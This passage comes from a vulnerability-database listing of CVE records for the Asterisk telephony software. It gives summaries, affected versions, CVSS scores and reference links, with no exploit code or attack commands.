              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-15T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2007-022.html"
        },
        {
          "name": "38201",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/38201"
        },
        {
          "name": "asterisk-contentheader-bo(37052)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37052"
        },
        {
          "name": "38202",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/38202"
        },
        {
          "name": "27184",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/27184"
        },
        {
          "name": "1018804",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1018804"
        },
        {
          "name": "26005",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/26005"
        },
        {
          "name": "asterisk-sprintf-bo(37051)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37051"
        },
        {
          "name": "20071010 AST-2007-022: Buffer overflows in voicemail when using IMAP storage",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/481996/100/0/threaded"
        },
        {
          "name": "ADV-2007-3454",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/3454"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-5358",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple buffer overflows in the voicemail functionality in Asterisk 1.4.x before 1.4.13, when using IMAP storage, might allow (1) remote attackers to execute arbitrary code via a long combination of Content-type and Content-description headers, or (2) local users to execute arbitrary code via a long combination of astspooldir, voicemail context, and voicemail mailbox fields.  NOTE: vector 2 requires write access to Asterisk configuration files."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.digium.com/pub/security/AST-2007-022.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2007-022.html"
            },
            {
              "name": "38201",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/38201"
            },
            {
              "name": "asterisk-contentheader-bo(37052)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37052"
            },
            {
              "name": "38202",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/38202"
            },
            {
              "name": "27184",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/27184"
            },
            {
              "name": "1018804",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1018804"
            },
            {
              "name": "26005",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/26005"
            },
            {
              "name": "asterisk-sprintf-bo(37051)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37051"
            },
            {
              "name": "20071010 AST-2007-022: Buffer overflows in voicemail when using IMAP storage",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/481996/100/0/threaded"
            },
            {
              "name": "ADV-2007-3454",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/3454"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-5358",
    "datePublished": "2007-10-12T23:00:00",
    "dateReserved": "2007-10-10T00:00:00",
    "dateUpdated": "2024-08-07T15:31:57.205Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2016-9938

Vulnerability from cvelistv5

Published

2016-12-12 21:00

Modified

2024-08-06 03:07

Severity ?

Summary

An issue was discovered in Asterisk Open Source 11.x before 11.25.1, 13.x before 13.13.1, and 14.x before 14.2.1 and Certified Asterisk 11.x before 11.6-cert16 and 13.x before 13.8-cert4. The chan_sip channel driver has a liberal definition for whitespace when attempting to strip the content between a SIP header name and a colon character. Rather than following RFC 3261 and stripping only spaces and horizontal tabs, Asterisk treats any non-printable ASCII character as if it were whitespace. This means that headers such as Contact\x01: will be seen as a valid Contact header. This mostly does not pose a problem until Asterisk is placed in tandem with an authenticating SIP proxy. In such a case, a crafty combination of valid and invalid To headers can cause a proxy to allow an INVITE request into Asterisk without authentication since it believes the request is an in-dialog request. However, because of the bug described above, the request will look like an out-of-dialog request to Asterisk. Asterisk will then process the request as a new call. The result is that Asterisk can process calls from unvetted sources without any authentication. If you do not use a proxy for authentication, then this issue does not affect you. If your proxy is dialog-aware (meaning that the proxy keeps track of what dialogs are currently valid), then this issue does not affect you. If you use chan_pjsip instead of chan_sip, then this issue does not affect you.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2016-009.html	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/94789	vdb-entry, x_refsource_BID
	http://www.securitytracker.com/id/1037408	vdb-entry, x_refsource_SECTRACK

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T03:07:31.471Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2016-009.html"
          },
          {
            "name": "94789",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/94789"
          },
          {
            "name": "1037408",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1037408"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-12-12T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Asterisk Open Source 11.x before 11.25.1, 13.x before 13.13.1, and 14.x before 14.2.1 and Certified Asterisk 11.x before 11.6-cert16 and 13.x before 13.8-cert4. The chan_sip channel driver has a liberal definition for whitespace when attempting to strip the content between a SIP header name and a colon character. Rather than following RFC 3261 and stripping only spaces and horizontal tabs, Asterisk treats any non-printable ASCII character as if it were whitespace. This means that headers such as Contact\\x01: will be seen as a valid Contact header. This mostly does not pose a problem until Asterisk is placed in tandem with an authenticating SIP proxy. In such a case, a crafty combination of valid and invalid To headers can cause a proxy to allow an INVITE request into Asterisk without authentication since it believes the request is an in-dialog request. However, because of the bug described above, the request will look like an out-of-dialog request to Asterisk. Asterisk will then process the request as a new call. The result is that Asterisk can process calls from unvetted sources without any authentication. If you do not use a proxy for authentication, then this issue does not affect you. If your proxy is dialog-aware (meaning that the proxy keeps track of what dialogs are currently valid), then this issue does not affect you. If you use chan_pjsip instead of chan_sip, then this issue does not affect you."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-26T09:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2016-009.html"
        },
        {
          "name": "94789",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/94789"
        },
        {
          "name": "1037408",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1037408"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-9938",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Asterisk Open Source 11.x before 11.25.1, 13.x before 13.13.1, and 14.x before 14.2.1 and Certified Asterisk 11.x before 11.6-cert16 and 13.x before 13.8-cert4. The chan_sip channel driver has a liberal definition for whitespace when attempting to strip the content between a SIP header name and a colon character. Rather than following RFC 3261 and stripping only spaces and horizontal tabs, Asterisk treats any non-printable ASCII character as if it were whitespace. This means that headers such as Contact\\x01: will be seen as a valid Contact header. This mostly does not pose a problem until Asterisk is placed in tandem with an authenticating SIP proxy. In such a case, a crafty combination of valid and invalid To headers can cause a proxy to allow an INVITE request into Asterisk without authentication since it believes the request is an in-dialog request. However, because of the bug described above, the request will look like an out-of-dialog request to Asterisk. Asterisk will then process the request as a new call. The result is that Asterisk can process calls from unvetted sources without any authentication. If you do not use a proxy for authentication, then this issue does not affect you. If your proxy is dialog-aware (meaning that the proxy keeps track of what dialogs are currently valid), then this issue does not affect you. If you use chan_pjsip instead of chan_sip, then this issue does not affect you."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2016-009.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2016-009.html"
            },
            {
              "name": "94789",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/94789"
            },
            {
              "name": "1037408",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1037408"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-9938",
    "datePublished": "2016-12-12T21:00:00",
    "dateReserved": "2016-12-12T00:00:00",
    "dateUpdated": "2024-08-06T03:07:31.471Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-49786

Vulnerability from cvelistv5

Published

2023-12-14 19:47

Modified

2025-02-13 17:18

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.

References

▼	URL	Tags
	https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq	x_refsource_CONFIRM
	https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05	x_refsource_MISC
	https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race	x_refsource_MISC
	http://www.openwall.com/lists/oss-security/2023/12/15/7
	http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html
	http://seclists.org/fulldisclosure/2023/Dec/24
	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html

Impacted products

	Vendor	Product	Version
	asterisk	asterisk	Version: < 18.20.1 Version: >= 19.0.0, < 20.5.1 Version: = 21.0.0 Version: < 18.9-cert6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T22:01:25.997Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
          },
          {
            "name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
          },
          {
            "name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2023/Dec/24"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-49786",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-08T14:19:55.907894Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-08T14:20:19.222Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "asterisk",
          "vendor": "asterisk",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 18.20.1"
            },
            {
              "status": "affected",
              "version": "\u003e= 19.0.0, \u003c 20.5.1"
            },
            {
              "status": "affected",
              "version": "= 21.0.0"
            },
            {
              "status": "affected",
              "version": "\u003c 18.9-cert6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-703",
              "description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-29T00:06:18.647Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
        },
        {
          "name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
        },
        {
          "name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
        },
        {
          "url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/24"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
        }
      ],
      "source": {
        "advisory": "GHSA-hxj9-xwr8-w8pq",
        "discovery": "UNKNOWN"
      },
      "title": "Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-49786",
    "datePublished": "2023-12-14T19:47:46.306Z",
    "dateReserved": "2023-11-30T13:39:50.862Z",
    "dateUpdated": "2025-02-13T17:18:55.224Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-8412

Vulnerability from cvelistv5

Published

2014-11-24 15:00

Modified

2024-08-06 13:18

Severity ?

Summary

The (1) VoIP channel drivers, (2) DUNDi, and (3) Asterisk Manager Interface (AMI) in Asterisk Open Source 1.8.x before 1.8.32.1, 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8.28 before 1.8.28-cert3 and 11.6 before 11.6-cert8 allows remote attackers to bypass the ACL restrictions via a packet with a source IP that does not share the address family as the first ACL entry.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-012.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:18:48.295Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-012.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-11-20T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The (1) VoIP channel drivers, (2) DUNDi, and (3) Asterisk Manager Interface (AMI) in Asterisk Open Source 1.8.x before 1.8.32.1, 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8.28 before 1.8.28-cert3 and 11.6 before 11.6-cert8 allows remote attackers to bypass the ACL restrictions via a packet with a source IP that does not share the address family as the first ACL entry."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-11-24T13:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-012.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-8412",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The (1) VoIP channel drivers, (2) DUNDi, and (3) Asterisk Manager Interface (AMI) in Asterisk Open Source 1.8.x before 1.8.32.1, 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8.28 before 1.8.28-cert3 and 11.6 before 11.6-cert8 allows remote attackers to bypass the ACL restrictions via a packet with a source IP that does not share the address family as the first ACL entry."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-012.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-012.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-8412",
    "datePublished": "2014-11-24T15:00:00",
    "dateReserved": "2014-10-22T00:00:00",
    "dateUpdated": "2024-08-06T13:18:48.295Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-4048

Vulnerability from cvelistv5

Published

2014-06-17 14:00

Modified

2024-08-06 11:04

Severity ?

Summary

The PJSIP Channel Driver in Asterisk Open Source before 12.3.1 allows remote attackers to cause a denial of service (deadlock) by terminating a subscription request before it is complete, which triggers a SIP transaction timeout.

References

▼	URL	Tags
	http://www.securityfocus.com/archive/1/532416/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://packetstormsecurity.com/files/127090/Asterisk-Project-Security-Advisory-AST-2014-008.html	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2014-008.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T11:04:28.479Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20140612 AST-2014-008: Denial of Service in PJSIP Channel Driver Subscriptions",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/532416/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/127090/Asterisk-Project-Security-Advisory-AST-2014-008.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-008.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-06-12T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The PJSIP Channel Driver in Asterisk Open Source before 12.3.1 allows remote attackers to cause a denial of service (deadlock) by terminating a subscription request before it is complete, which triggers a SIP transaction timeout."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20140612 AST-2014-008: Denial of Service in PJSIP Channel Driver Subscriptions",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/532416/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/127090/Asterisk-Project-Security-Advisory-AST-2014-008.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-008.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-4048",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The PJSIP Channel Driver in Asterisk Open Source before 12.3.1 allows remote attackers to cause a denial of service (deadlock) by terminating a subscription request before it is complete, which triggers a SIP transaction timeout."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20140612 AST-2014-008: Denial of Service in PJSIP Channel Driver Subscriptions",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/532416/100/0/threaded"
            },
            {
              "name": "http://packetstormsecurity.com/files/127090/Asterisk-Project-Security-Advisory-AST-2014-008.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/127090/Asterisk-Project-Security-Advisory-AST-2014-008.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-008.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-008.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-4048",
    "datePublished": "2014-06-17T14:00:00",
    "dateReserved": "2014-06-12T00:00:00",
    "dateUpdated": "2024-08-06T11:04:28.479Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-1599

Vulnerability from cvelistv5

Published

2011-04-27 00:00

Modified

2024-08-06 22:28

Severity ?

Summary

manager.c in the Manager Interface in Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 does not properly check for the system privilege, which allows remote authenticated users to execute arbitrary commands via an Originate action that has an Async header in conjunction with an Application header.

References

▼	URL	Tags
	http://www.vupen.com/english/advisories/2011/1188	vdb-entry, x_refsource_VUPEN
	http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html	vendor-advisory, x_refsource_FEDORA
	http://www.debian.org/security/2011/dsa-2225	vendor-advisory, x_refsource_DEBIAN
	http://openwall.com/lists/oss-security/2011/04/22/6	mailing-list, x_refsource_MLIST
	http://www.securityfocus.com/bid/47537	vdb-entry, x_refsource_BID
	http://www.vupen.com/english/advisories/2011/1086	vdb-entry, x_refsource_VUPEN
	http://securitytracker.com/id?1025433	vdb-entry, x_refsource_SECTRACK
	http://www.vupen.com/english/advisories/2011/1107	vdb-entry, x_refsource_VUPEN
	http://secunia.com/advisories/44529	third-party-advisory, x_refsource_SECUNIA
	http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html	vendor-advisory, x_refsource_FEDORA
	http://downloads.digium.com/pub/security/AST-2011-006.html	x_refsource_CONFIRM
	http://secunia.com/advisories/44197	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T22:28:41.962Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2011-1188",
